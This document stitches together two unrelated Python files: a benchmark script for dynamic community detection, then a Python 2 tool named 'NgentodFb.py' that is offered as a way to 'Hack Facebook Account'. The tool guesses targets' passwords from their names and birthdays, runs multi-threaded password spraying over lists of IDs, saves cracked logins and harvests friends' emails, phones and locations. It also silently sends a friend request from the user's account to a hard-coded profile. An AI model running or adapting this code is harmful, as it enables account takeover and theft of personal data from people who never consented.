"mucha": mucha_opti, # "mucha_global":mucha_global,
"survival_graph": tn.DCD.label_smoothing} # ,"dynmoga":dynmoga}#
# methods_to_test = {"smoothed_louvain":smoothed_louvain}#,"dynmoga":dynmoga}#
return methods_to_test
def generate_graph(nb_com=6, min_size=4, max_size=15, operations=18, mu=0.1):
print("generating graph with nb_com = ",nb_com)
prog_scenario = tn.ComScenario(verbose=False, external_density_penalty=mu)
all_communities = set(prog_scenario.INITIALIZE(np.random.randint(min_size,max_size,size=nb_com)))
for i in range(operations):
[com1] = np.random.choice(list(all_communities),1,replace=False)
all_communities.remove(com1)
if len(com1.nodes())<max_size and len(all_communities)>0: #merge
[com2] = np.random.choice(list(all_communities),1,replace=False)
largest_com = max([com1,com2],key=lambda x: len(x.nodes()))
merged = prog_scenario.MERGE([com1,com2], largest_com.label(), wait=20)
all_communities.remove(com2)
all_communities.add(merged)
else: #split
smallest_size = int(len(com1.nodes())/3)
(com2,com3) = prog_scenario.SPLIT(com1, [prog_scenario._get_new_ID("CUSTOM"), com1.label()], [smallest_size, len(com1.nodes()) - smallest_size], wait=20)
all_communities|= set([com2,com3])
(dyn_graph,dyn_com) = prog_scenario.run()
return(dyn_graph,dyn_com)
def compute_all_stats(all_infos, detailed=True):
names = []
times = []
LaNMI = []
LNMI = []
LF1 = []
LARI = []
nb_changes = []
# entropies = []
ent_by_nodes = []
S = []
modularities = []
nmis = []
IDs = {}
for id,an_experiment in all_infos.items():
GT_as_sn = an_experiment["GT"]
dyn_graph_sn=an_experiment["graph"]
results = an_experiment["result"]
iteration = an_experiment["ID"]
print(id)
for name, (result, time) in results.items():
for k, v in iteration.items():
IDs.setdefault(k,[])
IDs[k].append(v)
names.append(name)
times.append(time["total"])
if detailed:
LaNMI.append(longitudinal_similarity(GT_as_sn, result))
def nf1go(x, y):
a = NF1(y, x)
score = a.get_f1()[0]
return score
LF1.append(longitudinal_similarity(GT_as_sn,result,score=nf1go,convert_coms_sklearn_format=False))
LNMI.append(longitudinal_similarity(GT_as_sn, result))
LARI.append(longitudinal_similarity(GT_as_sn, result, score=adjusted_rand_score))
nb_changes.append(nb_node_change(result))
consecutive_NMIs = consecutive_sn_similarity(result)
#entropies.append(entropy(result))
ent_by_nodes.append(entropy_by_node(result)) #####Slow
S.append(np.average(consecutive_NMIs[0], weights=consecutive_NMIs[1]))
mods = quality_at_each_step(result, dyn_graph_sn)
modularities.append(np.average(mods[0], weights=mods[1]))
sim = similarity_at_each_step(GT_as_sn,result)
nmis.append(np.average(sim[0],weights=sim[1]))
df = pd.DataFrame()
df["algorithm"] = names
df["running time"] = times
if detailed:
df["LaNMI"] = LaNMI
df["LNMI"] = LNMI
df["LF1"] = LF1
df["LARI"] = LARI
df["M"] = nb_changes
#df["I_old"] = entropies
df["I"] = ent_by_nodes
df["S"] = S
df["Q"] = modularities
df["aNMI"] = nmis
df["# nodes"] = len(dyn_graph_sn.snapshots(dyn_graph_sn.snapshots_timesteps()[0]).nodes)
df["# steps"] = len(dyn_graph_sn.snapshots())
for k,l in IDs.items():
df[k]=l
return df
def run_all_algos(methods_to_test, dyn_graph_sn, plot=False, waiting=120):
"""
:param methods_to_test:
:param dyn_graph_sn:
:param plot:
:param waiting:
:return:
"""
results = {}
if plot:
dyn_graph = dyn_graph_sn.to_DynGraphIG(sn_duration=1)
methods_this_step = {name: m for name, m in methods_to_test.items()}
for name, m in methods_this_step.items():
results[name] = m(dyn_graph_sn, elapsed_time=True)
# manager = multiprocessing.Manager()
# temp = manager.list()
# p = multiprocessing.Process(target=_get_return, args=(m,dyn_graph_sn,True,temp))
# p.start()
# p.join(waiting)
# if p.is_alive():
# print ("running... let's kill it...")
# del methods_to_test[name]
# Terminate
# p.terminate()
# p.join()
# else:
# results[name] = temp[0]
if plot:
output_file(name + ".html")
p = tn.plot_longitudinal(dyn_graph, results[name][0].to_DynCommunitiesIG(1))
show(p)
export_png(p, filename=name + ".png")
return results
def subset(graph, com, length):
subgraph = tn.DynGraphSN(list(graph.snapshots().values())[:length])
subcomsGT = tn.DynCommunitiesSN()
for t in subgraph.snapshots_timesteps():
subcomsGT.set_communities(t, com.snapshot_communities(t))
return (subgraph, subcomsGT)
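# end-to-end usage sketch (assumptions: tnetwork plus the external detectors
# (dynamo, a MATLAB engine for mucha) are installed; the sizes below are
# deliberately tiny and purely illustrative):
if __name__ == '__main__':
    dyn_graph, dyn_com = generate_graph(nb_com=4, operations=5)
    methods = standard_methods_to_test()
    results = run_all_algos(methods, dyn_graph)
    all_infos = {0: {"GT": dyn_com, "graph": dyn_graph,
                     "result": results, "ID": {"run": 0}}}
    print(compute_all_stats(all_infos))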
|
NgentodFb.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mMarioV2\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m J4CKW!EL_- \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;92m \x1b[92mhttp://marioxploit.home.blog\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/Asedekontol\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
